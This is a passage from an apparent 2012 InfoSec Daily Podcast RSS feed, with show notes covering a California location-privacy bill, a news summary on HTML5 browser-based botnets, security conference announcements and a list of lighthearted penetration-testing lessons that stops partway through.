<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">The Chinese vessels initially prevented the Philippine Navy from arresting alleged Chinese poachers in the area. The stand-off is continuing.</span></p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">&hellip;.</span></p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; vertical-align: baseline; white-space: pre-wrap; ">Source:</span><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; "> </span><a href="http://nakedsecurity.sophos.com/2012/04/27/carriers-oppose-producing-warrants-for-location-data/"><span style="font-size: 15px; font-family: Arial; color: rgb(17, 85, 204); background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">http://nakedsecurity.sophos.com/2012/04/27/carriers-oppose-producing-warrants-for-location-data/</span></a></p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">The mobile carriers industry trade group, CTIA&ndash;The Wireless Association, is objecting to a proposed bill that would require the police to produce a warrant if it wants access to location data on people&#39;s mobile phones.</span></p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">CTIA are calling the legislation &quot;unduly burdensome&quot; to say no to police who arrive without warrants.</span></p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">The bill in question, </span><a href="https://www.eff.org/sites/default/files/filenode/sb1434april92012.pdf"><span style="font-size: 16px; font-family: Arial; color: rgb(17, 85, 204); background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">California Location Privacy Bill (SB 1434)</span></a><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">, doesn&#39;t stop the carriers from handing over location data, but it does require that police get a warrant first.</span></p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">The proposed law also states that carriers must publish reports showing the number of disclosures they&#39;ve made in a given calendar year, including:</span></p>
<ul style="font-family: Times; font-size: medium; margin-top: 0pt; margin-bottom: 0pt; ">
<li style="list-style-type: disc; font-size: 15px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; ">
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; background-color: transparent; vertical-align: baseline; white-space: pre-wrap; ">how many times each wireless provider disclosed information (and how many times it didn&#39;t)</span></p>
</li>
<li style="list-style-type: disc; font-size: 15px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; ">
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; background-color: transparent; vertical-align: baseline; white-space: pre-wrap; ">how many times the carrier contested data demands</span></p>
</li>
<li style="list-style-type: disc; font-size: 15px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; ">
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; background-color: transparent; vertical-align: baseline; white-space: pre-wrap; ">how many users&#39; data were disclosed.</span></p>
</li>
</ul>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">And this report is to published on the internet by the following April.</span></p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">On April 12, the CTIA </span><a href="http://www.aclunc.org/docs/technology/cita_opposes_sb_1434_leno.pdf"><span style="font-size: 16px; font-family: Arial; color: rgb(17, 85, 204); background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">wrote [PDF]</span></a><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; "> to the bill&#39;s sponsor, State Senator Mark Leno, saying that CTIA opposes the proposed legislation due to &quot;serious concerns&quot;:</span></p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">&quot;These reporting mandates would unduly burden wireless providers and their employees &ndash; who are working day and night to assist law enforcement to ensure the public&rsquo;s safety and to save lives.&quot;</span></p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">&#8230; and that the legislation would &quot;confuse&quot; them.</span></p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">For example, an issue the carriers would find confusing is the definition of &quot;location information.&quot; CTIA say that it is &quot;so sweeping&quot; that it could overlap basic subscriber information:</span></p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">&quot;Since the implications of this definition are unclear, wireless providers will have difficulty figuring out how to respond to requests for such information. It could place providers in the position of requiring warrants for all law enforcement requests.&quot;</span></p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">Ars Technica&#39;s Cyrus Farivar, for one, </span><a href="http://arstechnica.com/business/news/2012/04/cellphone-industry-opposes-california-location-privacy-bill.ars"><span style="font-size: 16px; font-family: Arial; color: rgb(17, 85, 204); background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">is confused</span></a><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; "> about why the CTIA is confused.</span></p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">Here&#39;s what he had to say:</span></p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">&quot;Earlier this month, the </span><a href="http://www.aclu.org/protecting-civil-liberties-digital-age/cell-phone-location-tracking-public-records-request"><span style="font-size: 16px; font-family: Arial; color: rgb(17, 85, 204); background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">ACLU said it received over 5,500 pages from 200 local law enforcement agencies</span></a><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">about their tracking policies. The organization concluded that &#39;while cell phone tracking is routine, few agencies consistently obtain warrants.</span></p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">Importantly, however, some agencies do obtain warrants, showing that law enforcement agencies can protect Americans&#39; privacy while also meeting law enforcement needs.&#39; In short, it seems like law enforcement can stay within the law, even when it takes the trouble to get a warrant&mdash;how is that confusing?&quot;</span></p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">Regarding the cost and labour involved in putting up reports that tell the public how they are releasing our information: well, if it&#39;s really all that costly to the poor, cash-strapped wireless providers, perhaps it&#39;s time for them to increase the fees they charge law enforcement agencies for the all-you-can-eat buffet of data they provide.</span></p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">&hellip;.</span></p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; ">&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.07924103108234704" style="color: rgb(0, 0, 0); "><span style="font-size: 16px; font-family: Arial; background-color: transparent; vertical-align: baseline; white-space: pre-wrap; ">Late Announcement:</span></b></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.07924103108234704" style="color: rgb(0, 0, 0); "><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">Help Brad get a handicap accessible van. </span><a href="http://www.nmeda.com/mobility-awareness-month/heroes/montana/helena/1535/nina-and-brad-smith"><span style="font-size: 16px; font-family: Arial; color: rgb(17, 85, 204); background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">http://www.nmeda.com/mobility-awareness-month/heroes/montana/helena/1535/nina-and-brad-smith</span></a></b></p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">[end]</span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-655-derbycon-sales-kick-off-html5-bots-spam-on-the-run-oh-we-fixed-that-philippine-attacks-warrants-please-no/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3851/0/infosec-daily-podcast-episode-655.mp3" length="68289184" type="audio/mpeg" />
		<itunes:duration>0:47:24</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 655 for April 27, 2012. Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, Adrian Crenshaw, Geordy Rostad, and Karthik Rangarajan.

	
Special Guests: Erin Kennedy, and Nick
&#160;
&#160;
Announ[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 655 for April 27, 2012. Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, Adrian Crenshaw, Geordy Rostad, and Karthik Rangarajan.

	
Special Guests: Erin Kennedy, and Nick
&#160;
&#160;
Announcements
Linuxfest Northwest 2012
	When: April 28-29, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
&#160;
AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center &#160;- Huntington, West Virginia
	http://www.appyide.org/
&#160;
LayerOne 2012
	When: May 26-27, 2012
	Where: Clarion Hotel &#8211; Anaheim, CA
	http://www.layerone.org
&#160;
Security 504: Hacker Techniques, Exploits &#38; Infcident Handling &#8211; Matt Romanek
When: June 20 &#8211; 27, 2012
	Where: Courtyard Seattle Federal Way, WA 
	http://www.sans.org/mentor/details.php?nid=28014
	&#160;
Social Engineering Training
When: July 21-24, 2012
	Where: Black Hat Vegas
When: August 20-24, 2012
	Where: &#160;Bristol, UK
When: &#160;November 12-16, 2012
	Where: &#160;Columbia, MD
	http://www.social-engineer.com/social-engineer-training
&#160;
Inside and Out of the Social-Engineer Toolkit (SET)
	When: July 21 &#8211; 22, 2012
	When: July 23 &#8211; 24, 2012
	Where: Black Hat Vegas
	http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html
&#160;
DerbyCon 2012 &#8211; The &#8220;Deuce&#8221; Reunion
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
&#160;
Skydogcon
	When: October 26-28
	Where: Hotel Preston in Nashville, TN 
	http://www.skydogcon.com 
&#160;
Please consider making your &#160;Amazon purchases through our affiliate link. &#160;If you&#8217;re not familiar with the affiliate link it is locate the Affiliate Program link on the right hand side.
or simply use our QR Code Links.
Amazon:
	
Amazon UK:
	
You don't have a sufficient version of Flash Player to display this animation.
&#160;
Stories
Source: &#160;http://www.theregister.co.uk/2012/04/27/html5/
HTML5 will allow web designers to pull off tricks that were previously only possible with Adobe Flash or convoluted JavaScript. But the technology, already widely supported by web browsers, creates plenty of opportunities for causing mischief.
During a presentation at the B-Sides Conference in London on Wednesday, Robert McArdle, a senior threat researcher at Trend Micro, outlined how the revamped markup language could be used to launch browser-based botnets and other attacks. The new features in HTML5 &#8211; from WebSockets to cross-origin requests &#8211; could send tremors through the information security battleground and turn the likes of Chrome and Firefox into complete cybercrime toolkits.
Many of the attack scenarios involve using JavaScript to create memory-resident &#34;botnets in a browser&#34;, McArdle warned, which can send spam, launch denial-of-service attacks or worse. And because an attack is browser-based, anything from a Mac OS X machine to an Android smartphone will be able to run the platform-neutral code, utterly simplifying the development of malware.
Creating botnets by luring punters into visiting a malicious web page, as opposed to having them open a booby-trapped file that exploits a security flaw, offers a number of advantages to hackers.
Malicious web documents held in memory are difficult to detect with traditional file-scanning antivirus packages, which seek out bad content stored on disk. JavaScript code is also very easy to obfuscate, so network gateways that look for signatures of malware in packet traffic are trivial to bypass &#8211; and HTTP-based attacks pass easily through most firewalls.
Additional dangers involve social engineering using HTML5&#39;s customisable pop-ups that appear outside the browser to fool users into believing the wording on an alert box. More convincing phishing attacks can be created using the technique, McArdle said.
&#34;The good stuff in HTML5 outweighs the bad,[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 654 &#8211; @PentestLessons, CISPA Passed, RuggedCom, 36 CC Sites, Smuggling Halted, Big Brother, and Hotmail 0-day</title>
		<link>http://www.isdpodcast.com/episode-654-pentestlessons-cispa-passed-ruggedcom-36-cc-sites-smuggling-halted-big-brother-and-hotmail-0-day</link>
		<comments>http://www.isdpodcast.com/episode-654-pentestlessons-cispa-passed-ruggedcom-36-cc-sites-smuggling-halted-big-brother-and-hotmail-0-day#comments</comments>
		<pubDate>Fri, 27 Apr 2012 01:05:23 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3847</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 654 for April 26, 2012. Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Adrian Crenshaw, and Karthik Rangarajan. &#160; Announcements Linuxfest Northwest 2012 When: April 28-29, 2012 Where: Bellingham Technical College &#8211; Bellingham, WA http://www.linuxfestnorthwest.org/ &#160; AIDE 2012 When: May 21-25, 2012 Where: MU Forensic Science Center &#160;- Huntington, West [...]]]></description>
			<content:encoded><![CDATA[<p><b id="internal-source-marker_0.22227523778565228" style="font-family: Times; font-size: medium; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; vertical-align: baseline; white-space: pre-wrap; ">InfoSec Daily Podcast Episode 654 for April 26, 2012. </span><span style="font-size: 16px; font-family: Arial; vertical-align: baseline; white-space: pre-wrap; ">Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Adrian Crenshaw, and Karthik Rangarajan.</span></b></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; ">&nbsp;</p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap; ">Announcements</span></p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; vertical-align: baseline; white-space: pre-wrap; ">Linuxfest Northwest 2012<br class="kix-line-break" /><br />
	</span><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">When: April 28-29, 2012<br class="kix-line-break" /><br />
	Where: Bellingham Technical College &#8211; Bellingham, WA<br class="kix-line-break" /><br />
	</span><a href="http://www.linuxfestnorthwest.org/"><span style="font-size: 16px; font-family: Arial; color: rgb(0, 0, 153); background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">http://www.linuxfestnorthwest.org/</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; vertical-align: baseline; white-space: pre-wrap; ">AIDE 2012<br class="kix-line-break" /><br />
	</span><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">When: May 21-25, 2012<br class="kix-line-break" /><br />
	Where: MU Forensic Science Center &nbsp;- Huntington, West Virginia<br class="kix-line-break" /><br />
	</span><a href="http://www.appyide.org/"><span style="font-size: 16px; font-family: Arial; color: rgb(17, 85, 204); background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">http://www.appyide.org/</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; vertical-align: baseline; white-space: pre-wrap; ">LayerOne 2012<br class="kix-line-break" /><br />
	</span><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">When: May 26-27, 2012<br class="kix-line-break" /><br />
	Where: Clarion Hotel &#8211; Anaheim, CA<br class="kix-line-break" /><br />
	</span><a href="http://www.layerone.org/"><span style="font-size: 16px; font-family: Arial; color: rgb(0, 0, 153); background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">http://www.layerone.org</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; vertical-align: baseline; white-space: pre-wrap; ">Security 504: Hacker Techniques, Exploits &amp; Incident Handling &#8211; Matt Romanek</span></p>
<p><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">When: June 20 &#8211; 27, 2012<br class="kix-line-break" /><br />
	Where: Courtyard Seattle Federal Way, WA</span><a href="http://www.sans.org/mentor/details.php?nid=28014" style="font-family: Times; font-size: medium; "><span style="font-size: 16px; font-family: Arial; color: rgb(0, 0, 0); background-color: transparent; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; "> <br class="kix-line-break" /><br />
	</span><span style="font-size: 16px; font-family: Arial; color: rgb(17, 85, 204); background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">http://www.sans.org/mentor/details.php?nid=28014</span></a><br />
	&nbsp;</p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; vertical-align: baseline; white-space: pre-wrap; ">Social Engineering Training</span></p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">When: July 21-24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas</span></p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">When: August 20-24, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Bristol, UK</span></p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">When: &nbsp;November 12-16, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Columbia, MD<br class="kix-line-break" /><br />
	</span><a href="http://www.social-engineer.com/social-engineer-training"><span style="font-size: 16px; font-family: Arial; color: rgb(0, 0, 153); background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">http://www.social-engineer.com/social-engineer-training</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; vertical-align: baseline; white-space: pre-wrap; ">Inside and Out of the Social-Engineer Toolkit (SET)<br class="kix-line-break" /><br />
	</span><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">When: July 21 &#8211; 22, 2012<br class="kix-line-break" /><br />
	When: July 23 &#8211; 24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas<br class="kix-line-break" /><br />
	</span><a href="http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html"><span style="font-size: 16px; font-family: Arial; color: rgb(17, 85, 204); background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; vertical-align: baseline; white-space: pre-wrap; ">DerbyCon 2012 &#8211; The &ldquo;Deuce&rdquo; Reunion<br class="kix-line-break" /><br />
	</span><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">When: &nbsp;September 27-30, 2012<br class="kix-line-break" /><br />
	Where: Louisville, KY<br class="kix-line-break" /><br />
	</span><a href="http://www.derbycon.com/"><span style="font-size: 16px; font-family: Arial; color: rgb(0, 0, 153); background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">http://www.derbycon.com</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; vertical-align: baseline; white-space: pre-wrap; ">Skydogcon</span><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; "><br class="kix-line-break" /><br />
	When: October 26-28<br class="kix-line-break" /><br />
	Where: Hotel Preston in Nashville, TN <br class="kix-line-break" /><br />
	</span><a href="http://www.skydogcon.com/"><span style="font-size: 16px; font-family: Arial; color: rgb(17, 85, 204); background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">http://www.skydogcon.com</span></a><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; "> </span></p>
<p>&nbsp;</p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">Please consider making your &nbsp;Amazon purchases through our affiliate link. &nbsp;If you&rsquo;re not familiar with the affiliate link it is locate the Affiliate Program link on the right hand side.</span></p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">Or simply use our QR Code Links.</span></p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; "><br />
	Amazon:<br />
	</span><img height="135px;" src="https://lh4.googleusercontent.com/XVlFw8JvgOjrnPdwintEt6cNY6m2MgfoRJhEP9Xc-GKxgYYXSkbYUdxJah1w5k8eI_yfwKFygT1Xua7C4COO1DL1QsMIUtdd3VZKYB-IOoHIQQ1TO4Q" width="135px;" /></p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">Amazon UK:<br />
	</span><img height="138px;" src="https://lh6.googleusercontent.com/wMWhs-ueJUJ58gfkPTJVQ4pueuUbae6vthuVPqpWuj2474wRO0ZSsNTpfGqowh_8ZUEprtFXYzzk1XdB1fvkwWmdHZdd6JbU8V_iy7Jai6E9cnMPc14" width="138px;" /></p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; "><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></p>
<p>&nbsp;</p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap; ">Pentest Lessons</span></p>
<ol style="font-family: Times; font-size: medium; margin-top: 0pt; margin-bottom: 0pt; ">
<li style="list-style-type: decimal; font-size: 15px; font-family: Arial; color: rgb(51, 51, 51); font-weight: normal; vertical-align: baseline; ">
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; color: rgb(0, 0, 0); background-color: transparent; vertical-align: baseline; white-space: pre-wrap; ">Don&#39;t cat binary files in cube farms. The beeps sound like alarms, and the natives have to decide whether to evacuate.</span></p>
</li>
<li style="list-style-type: decimal; font-size: 15px; font-family: Arial; color: rgb(51, 51, 51); font-weight: normal; vertical-align: baseline; ">
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; color: rgb(0, 0, 0); background-color: transparent; vertical-align: baseline; white-space: pre-wrap; ">Determining who is &quot;in the loop&quot; during a penetration test is an important step not best performed when you&rsquo;re almost finished with an engagement.</span></p>
</li>
<li style="list-style-type: decimal; font-size: 15px; font-family: Arial; color: rgb(51, 51, 51); font-weight: normal; vertical-align: baseline; ">
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; color: rgb(0, 0, 0); background-color: transparent; vertical-align: baseline; white-space: pre-wrap; ">When you pop a system, always always always grab the critical information first. &nbsp;</span></p>
</li>
<li style="list-style-type: decimal; font-size: 15px; font-family: Arial; color: rgb(51, 51, 51); font-weight: normal; vertical-align: baseline; ">
